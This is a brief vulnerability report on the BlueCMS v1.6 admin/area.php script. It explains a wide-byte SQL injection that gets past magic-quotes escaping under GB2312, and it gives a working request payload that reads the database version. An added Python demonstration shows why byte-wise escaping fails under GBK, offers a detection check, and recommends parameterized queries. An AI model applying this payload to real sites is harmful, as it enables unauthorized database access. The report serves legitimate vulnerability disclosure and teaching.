Bluecms_v1.6
Download
http://lp.downcode.com/j_14/j_14745_bluecms.rar
vulnerability code:
in admin/area.php line 36:





Line 36 of admin/area.php is not heavily filtered, and insert at line 47 allows injection
Single quotes cannot be injected because the argument passed in is get_magic_quotes_gpc()
However, we found the use of the GB2312 encoding in the returned response header
So we can do wide-byte injection here
payload: area_name=0%df',0,0,0,0),(0,@@Version,0,0,0,0)%23&parentid=0&show_order=0&act=doadd
Successful injection!
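Why byte-wise quote escaping fails under a wide-byte charset, as an added example (not code from the report or from BlueCMS). It assumes the database connection decodes input as GBK, the superset of GB2312 that Python's `gbk` codec implements; the function names are hypothetical and the sample is the first three bytes of the `area_name` value above.

```python
# Added illustration: models bytes only, no database is contacted.

def addslashes(raw: bytes) -> bytes:
    """Charset-unaware escaping, as PHP addslashes()/magic quotes apply it."""
    out = bytearray()
    for b in raw:
        if b == 0:
            out += b"\\0"            # NUL becomes backslash + '0'
        else:
            if b in b"'\"\\":
                out.append(0x5C)     # prepend a backslash byte
            out.append(b)
    return bytes(out)

def unescaped_quotes(escaped: bytes, charset: str) -> int:
    """Count single quotes that still terminate a string once the
    escaped bytes are decoded in `charset` (assumed server-side view)."""
    text = escaped.decode(charset, errors="replace")
    count = i = 0
    while i < len(text):
        if text[i] == "\\":          # backslash neutralises the next character
            i += 2
            continue
        count += text[i] == "'"
        i += 1
    return count

def lead_byte_before_quote(raw: bytes) -> bool:
    """Input check: a GBK lead byte (0x81-0xFE) directly followed by a quote.
    Quotes are never valid GBK trail bytes, so legitimate text cannot match."""
    i = 0
    while i < len(raw):
        if 0x81 <= raw[i] <= 0xFE and i + 1 < len(raw):
            nxt = raw[i + 1]
            if nxt in b"'\"":
                return True          # the inserted 0x5C would become the trail byte
            i += 2 if (0x40 <= nxt <= 0xFE and nxt != 0x7F) else 1
        else:
            i += 1
    return False

SAMPLE = b"0\xdf'"                   # first bytes of the reported area_name value

if __name__ == "__main__":
    esc = addslashes(SAMPLE)
    print(esc, unescaped_quotes(esc, "latin-1"), unescaped_quotes(esc, "gbk"))
    print(lead_byte_before_quote(SAMPLE))
```

The escaped quote survives in a single-byte view but not in the GBK view, which is why the fix is a parameterized query (or escaping done by the driver with the connection charset set correctly) rather than more filtering.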